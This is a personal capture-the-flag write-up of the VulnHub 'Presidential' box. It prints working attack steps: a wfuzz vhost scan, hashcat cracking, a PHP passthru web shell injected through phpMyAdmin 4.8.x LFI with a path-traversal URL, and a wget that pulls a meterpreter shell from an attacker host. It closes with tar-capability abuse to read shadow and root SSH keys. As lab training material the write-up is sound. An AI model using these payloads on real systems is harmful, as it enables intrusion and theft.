Vulnhub: https://www.vulnhub.com/entry/presidential-1,500/
** Just a heads up, I was able to import into VMware Workstation without an issue. **
1. First, doing a nmap scan for the CTF box’s IP Address. Once discovered, doing a nmap scan for available service ports.
2. We have two available ports, 2082 and port 80. Port 2082 was a ssh service and port 80 was an apache service running.
3. We do a dirb scan for port 80 to do directory enumeration.
4. We also need to observe and enumerate the web pages. I did this using Burp. I did not find much honestly for a while. I took note of the domain votenow.local and added to my hosts file. However, I was presented with the same information.
5. This is where I asked for clue from the author of the CTF. He mentioned there may be a hidden sub-domain and a backup file that could help get my a foothold to the box. I never thought of virtual hosts for the box. I went straight to wfuzz:
wfuzz -c -w /opt/DirBuster/directory-list-2.3-small.txt --hl 282 --hc 400,403,404 -H "Host: FUZZ.votenow.local" -t 100 http://votenow.local
This is where I found datasafe as a possible subdomain. Time to add it to the host file.
6. This is where I scanned the hidden subdomain for all kinds of possible backup files. Nothing. Well, interesting anyway.
7. What am I missing? There must be a backup file somewhere. I bet it is something simple too. Arrghhh.
8. Ok, clue number 2. Author suggested maybe try the main domain. Of course, I missed that, and it has CREDS!!
User: votebox
Password: casoj3FFASPsbyoRP
9. I was able to get in. Then, I checked out the Metasploit module to see if it was exploitable: https://www.rapid7.com/db/modules/exploit/multi/http/phpmyadmin_lfi_rce
10. It did not work. Seems like it should have worked. Oh well, let’s check around.
11. So I see the users table. I see there is a hash for the admin’s user account. That is all I see but hopefully I can use it somehow.
* Used the hash from the users table in the web app.
* hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
12. So we have a username and password. I was not able to use it to login or get different access to the phpMyAdmin app. Then, again I checked the phpMyAdmin version and checked for vulns again:
* https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/
* https://cupuzone.wordpress.com/2018/07/23/a-little-study-about-latest-phpmyadmin-4-8-0-4-8-1-lfi-vulnerability/
* https://www.exploit-db.com/exploits/44924
* https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e
* https://misduong.blogspot.com/2018/06/phpmyadmin-48x-lfi-to-rce-authorization.html
* https://cxsecurity.com/issue/WLB-2018070139
13. I can exploit the LFI vuln using the database. I was able to view the PHP config with phpinfo(). It took a minute to find the exact directory location for my session, but I eventually found it.
14. Now, let’s see if we can get a web shell in: select "<?php passthru($_GET ['cmd']);exit;?>"
15. http://datasafe.votenow.local/index.php?target=db_sql.php?/../../../../../../../../../../../../../../var/lib/php/session/sess_arnq9b3qlmeupe81tf632qj24qfeb39q&cmd=id
16. It worked. We now know that the process is running as apache instead of root.
17. We should be able to get a better web shell in there. We just need to host a page and get our small web shell to request the better one.
18. With a wget, we were able to request it and rename it. We are able to go to the page and now we have our meterpreter web shell working:
http://datasafe.votenow.local/index.php?target=db_sql.php?/../../../../../../../../../../../../../../var/lib/php/session/sess_arnq9b3qlmeupe81tf632qj24qfeb39q&cmd=wget%20http://192.168.126.1/agoonie.php%20-O%20shell.php
19. I looked around for processes running as root. Also, I looked for anything in the home directories. There was only the admin dir. It had two weird text files, user.txt and notes.txt. Also, noted the version of the OS: Linux votenow.local 3.10.0-1127.13.1.el7.x86_64 #1 SMP.
[admin@votenow ~]$ cat notes.txt
cat notes.txt
Reminders:
1) Utilise new commands to backup and compress sensitive files
[admin@votenow ~]$ cat user.txt
cat user.txt
663ba6a402a57536772c6118e8181570
20. I was stuck here. Uploaded the LinEnum.sh file. Looked for sticky bit files, more weird processes, etc. Found nothing. Clue number 3: Look up Linux ‘capabilities’ and you will find a file that will help.
21. After reading about this, now I got the clues from the text files in the admin folder. Additional reading:
* https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
* https://materials.rangeforce.com/tutorial/2020/02/19/Linux-PrivEsc-Capabilities/
* https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
22. So identified the tarS executable that could copy the shadow file and allow us to read it. I tried to crack it but no dice. I even thought I could possibly rewrite it and add my own hash to it. Nope.
23. I remembered about the --checkpoint exploit (wildcard injection). I had it in my notes from the OSCP or a previous CTF but it worth checking out. I tried writing a bash script that could possibly escalate me. Noooooope. Wait, it allowed me to read the shadow file. What about reading root’s ssh files??!!
24. I see the ssh_id file and we have the ssh port. Hopefully, it is not password protected. We are in.
25. I had to thank the author for a great CTF. It was challenging and yet another reminder, keep reading and learning.
